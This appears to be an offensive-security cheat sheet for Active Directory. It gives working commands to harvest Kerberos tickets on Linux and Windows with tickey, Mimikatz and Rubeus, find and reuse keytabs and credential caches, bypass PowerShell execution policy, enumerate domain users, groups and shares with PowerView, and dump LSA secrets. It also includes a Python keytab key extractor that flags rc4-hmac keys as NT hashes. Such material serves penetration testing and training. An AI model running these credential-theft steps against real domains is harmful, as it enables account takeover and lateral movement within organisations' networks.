# Active Directory

## Enumerate Juicy Info

### Harvest tickets from Linux

Check type and location of tickets:

```
grep default_ccache_name /etc/krb5.conf
```

If nothing is returned, the default is `FILE:/tmp/krb5cc_%{uid}`.

For file-based tickets, you can simply copy the cache file (if you have permissions on it) and use it.

If the tickets are stored in the kernel *KEYRING*, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```
# Dumps the current user's tickets; if run as root, it tries to dump everyone's
# by injecting into other users' processes. For injection to work, copy tickey
# to a folder that all users can reach.
cp tickey /tmp/tickey
/tmp/tickey -i
```

### Harvest tickets from Windows

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in PowerShell:

```
.\Rubeus.exe dump

# Rubeus prints the dumped tickets as base64; to write one to a .kirbi file:
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))
```

Reference:

<https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>

### krb5.keytab

Extract the keys from a keytab with KeyTabExtract: <https://github.com/sosdave/KeyTabExtract/blob/master/keytabextract.py>

```
# Linux: cached Kerberos keytabs and credential caches
find / -type f -iname "krb5.keytab" 2>/dev/null
find / -type f -iname "krb5cc_*" 2>/dev/null

# Windows: cached Kerberos keytabs and credential caches
dir "\krb5*.keytab" /s
dir "\krb5cc_*" /s
```
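To see what a found `krb5.keytab` actually exposes (which principals, encryption types and key versions), here is a small parser for the MIT keytab format (version `0x0502`), the same layout keytabextract.py reads. This is an added example, not code from the page or from KeyTabExtract; the sample keytab, the realm `LAB.LOCAL` and the host `srv01.lab.local` are constructed inline for the demo.

```python
import struct

# Encryption type numbers (RFC 3961/3962/4757) commonly found in AD keytabs.
ENCTYPES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}

def _counted(buf, off):  # keytab counted_octet_string: uint16 length + bytes
    (n,) = struct.unpack(">H", buf[off:off + 2])
    return buf[off + 2:off + 2 + n].decode("utf-8", "replace"), off + 2 + n

def parse_keytab(data):
    # Returns one dict per key entry: principal, kvno, enctype name, key (hex).
    if data[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version %r" % data[:2])
    pos, entries = 2, []
    while pos + 4 <= len(data):
        (size,) = struct.unpack(">i", data[pos:pos + 4])
        pos += 4
        if size < 0:                      # negative size marks a deleted slot: skip the hole
            pos -= size
            continue
        e, (ncomp,) = data[pos:pos + size], struct.unpack(">H", data[pos:pos + 2])
        realm, off = _counted(e, 2)
        comps = []
        for _ in range(ncomp):            # in v2 the realm is NOT counted in ncomp
            c, off = _counted(e, off)
            comps.append(c)
        _name_type, _ts, vno8, enctype, klen = struct.unpack(">IIBHH", e[off:off + 13]); off += 13
        key = e[off:off + klen]; off += klen
        # Optional trailing 32-bit kvno overrides the 8-bit one when present and nonzero.
        vno = (struct.unpack(">I", e[off:off + 4])[0] if off + 4 <= len(e) else 0) or vno8
        entries.append({"principal": "/".join(comps) + "@" + realm, "kvno": vno,
                        "enctype": ENCTYPES.get(enctype, str(enctype)), "key": key.hex()})
        pos += size
    return entries

def build_keytab_entry(realm, comps, enctype, key, kvno):
    # Encodes one entry; used only to construct the sample keytab below.
    body = struct.pack(">H", len(comps))
    for s in [realm] + comps:
        body += struct.pack(">H", len(s.encode())) + s.encode()
    body += struct.pack(">IIBHH", 1, 0, kvno & 0xFF, enctype, len(key)) + key
    return struct.pack(">i", len(body) + 4) + body + struct.pack(">I", kvno)

# Constructed sample keytab (not from any real host): a host key and an HTTP service key.
SAMPLE_KEYTAB = (b"\x05\x02"
    + build_keytab_entry("LAB.LOCAL", ["host", "srv01.lab.local"], 18, bytes(range(32)), 3)
    + build_keytab_entry("LAB.LOCAL", ["HTTP", "srv01.lab.local"], 23, bytes(16), 7))

if __name__ == "__main__":
    for ent in parse_keytab(SAMPLE_KEYTAB):
        print(f"{ent['principal']:<32} kvno={ent['kvno']} {ent['enctype']} key={ent['key']}")
```

Point `parse_keytab` at `open("/etc/krb5.keytab", "rb").read()` to list the entries of a real file; an `rc4-hmac` entry is worth flagging, since that key is the account's NT hash.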

If you find a `krb5cc_*` file, export its path in the `KRB5CCNAME` environment variable and check it with `klist`:

```
export KRB5CCNAME=/tmp/krb5cc_<uid>
klist

# if klist shows a valid ticket, you can authenticate with it without a password

python3 GetADUsers.py -all -k -no-pass -dc-ip 172.16.x.y <domain>/<username>
```

## PowerView

### Import module

```
powershell -ep bypass
# then, inside the PowerShell session:
. .\PowerView.ps1
```

### The Domain Users

```
Get-NetUser | select cn

# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof
```

### The Domain Groups

```
Get-NetGroup -GroupName *admin*
```

### The Shared Folder

```
Invoke-ShareFinder
```

Note: the default shares are:

```
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
```


### Net Computer

```
Get-NetComputer -FullData
Get-NetComputer -FullData | select operatingsystem
```

## Mimikatz

Note: must be run as administrator.

```
mimikatz.exe

privilege::debug
lsadump::lsa /patch
```
